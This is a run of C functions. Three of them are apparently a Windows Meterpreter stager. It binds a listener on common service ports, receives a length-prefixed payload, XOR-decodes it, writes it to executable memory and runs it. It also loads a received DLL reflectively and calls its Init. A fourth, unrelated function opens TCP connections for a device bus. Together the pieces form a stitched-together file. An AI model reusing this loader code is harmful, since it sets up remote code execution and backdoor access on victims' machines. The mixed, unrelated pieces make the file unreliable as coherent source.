/* http://www.tenouk.com/Winsock/Winsock2example2.html http://cs.baylor.edu/~donahoo/practical/CSockets/winsock.html */ int CALLBACK WinMain(_In_ HINSTANCE hInstance,_In_ HINSTANCE hPrevInstance,_In_ LPSTR lpCmdLine,_In_ int nCmdShow){ SOCKET ListenSocket; struct sockaddr_in service; SOCKET AcceptSocket; DWORD threadid; int ports[] = {3389,53,88,389,80,443,21,22,23,3306,8080,8443,137,138,139,445}; int i = 0; initwsa(); ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (ListenSocket == INVALID_SOCKET){ exit(0); } service.sin_family = AF_INET; service.sin_addr.s_addr = inet_addr("0.0.0.0"); for(i=0;i<(sizeof(ports)/sizeof(ports[0]));i++){ service.sin_port = htons(ports[i]); if (bind(ListenSocket, (SOCKADDR*) &service, sizeof(service)) == SOCKET_ERROR){ exit(0); } if (listen(ListenSocket, 10) == SOCKET_ERROR){ exit(0); } break; } while(1){ AcceptSocket = SOCKET_ERROR; while(AcceptSocket == SOCKET_ERROR){ AcceptSocket = accept(ListenSocket, NULL, NULL); } CreateThread(NULL,0,handleclient,(LPVOID)AcceptSocket,0,&threadid); } return 0; }
/* http://msdn.microsoft.com/en-us/library/windows/desktop/ms682516(v=vs.85).aspx read port:ip Receive stage set socket in EDI execute payload */ DWORD WINAPI threadexec(LPVOID exename){ SOCKET meterpretersock; int response = 0; int total = 0; unsigned char *payload; char recvbuf[1024]; DWORD payloadlength = 0; HMODULE loadedfile = NULL; if (initwsa() != 0){ exit(0); } meterpretersock = getsocket((char *)exename); response = recv(meterpretersock, (char *)&payloadlength, sizeof(DWORD), 0); payload = (unsigned char *)VirtualAlloc(NULL, payloadlength, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memset(payload, 0, payloadlength); memset(recvbuf, 0, 1024); do{ response = recv(meterpretersock, recvbuf, 1024, 0); if (USEXOR){ xor(&recvbuf[0], response); } memcpy(payload, recvbuf, response); payload += response; total += response; payloadlength -= response; } while (payloadlength > 0); payload -= total; __asm{ mov edi,meterpretersock } int(*ret)() = (int(*)())payload; ret(); }
DWORD WINAPI handleclient(LPVOID clientsocket){ int response = 0; int total = 0; char *payload; char recvbuf[1024]; DWORD payloadlength = 0; HMODULE loadedfile = NULL; if(initwsa() != 0){ exit(0); } response = recv((int)clientsocket, (char *)&payloadlength, sizeof(DWORD), 0); payload = (char *)malloc(payloadlength); memset(payload,0,payloadlength); memset(recvbuf,0,1024); do{ response = recv((int)clientsocket, recvbuf, 1024, 0); if(USEXOR){ xor(&recvbuf[0],response); } memcpy(payload,recvbuf,response); payload += response; total += response; payloadlength -= response; }while(payloadlength > 0); payload -= total; loadedfile = LoadLibraryR(payload,total); meterpreterstart = (MyInit) GetProcAddressR(loadedfile,"Init"); meterpreterstart((int)clientsocket); free(payload); }
smBusdevicePointer tcpipPortOpen(const char * devicename, smint32 baudrate_bps, smbool *success) { int sockfd; struct sockaddr_in server; struct timeval tv; fd_set myset; int res, valopt; socklen_t lon; unsigned long arg; *success=smfalse; if (validateIpAddress(devicename, NULL, NULL) != 0) { smDebug(-1,SMDebugLow,"TCP/IP: device name '%s' does not appear to be IP address, skipping TCP/IP open attempt (note: this is normal if opening a non-TCP/IP port)\n",devicename); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } char ip_addr[16]; unsigned short port = 4001; if (parseIpAddress(devicename, ip_addr, &port) < 0) { smDebug(-1,SMDebugLow,"TCP/IP: IP address parse failed\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } if(baudrate_bps!=SM_BAUDRATE) { smDebug(-1,SMDebugLow,"TCP/IP: Non-default baudrate not supported by TCP/IP protocol\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } smDebug(-1,SMDebugLow,"TCP/IP: Attempting to connect to %s:%d\n",ip_addr,port); #if defined(_WIN32) initwsa(); #endif //Create socket sockfd = socket(AF_INET , SOCK_STREAM , IPPROTO_TCP); if (sockfd == -1) { smDebug(-1,SMDebugLow,"TCP/IP: Socket open failed\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } // Set OFF NAGLE algorithm to disable stack buffering of small packets int one = 1; setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, (void *)&one, sizeof(one)); server.sin_addr.s_addr = inet_addr(ip_addr); server.sin_family = AF_INET; server.sin_port = htons(port); // Set non-blocking when trying to establish the connection #if !defined(_WIN32) arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); #else arg = 1; ioctlsocket(sockfd, FIONBIO, &arg); #endif res = connect(sockfd, (struct sockaddr *)&server, sizeof(server)); if (res < 0) { if (errno == EINPROGRESS) { tv.tv_sec = 5; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET((unsigned int)sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &tv) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { smDebug(-1,SMDebugLow,"TCP/IP: Setting socket properties failed\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } } else { smDebug(-1,SMDebugLow,"TCP/IP: Setting socket properties failed\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } } else { smDebug(-1,SMDebugLow,"TCP/IP: Connecting socket failed\n"); return SMBUSDEVICE_RETURN_ON_OPEN_FAIL; } } // Set to blocking mode again #if !defined(_WIN32) arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); #else arg = 0; ioctlsocket(sockfd, FIONBIO, &arg); #endif *success=smtrue; return (smBusdevicePointer)sockfd; }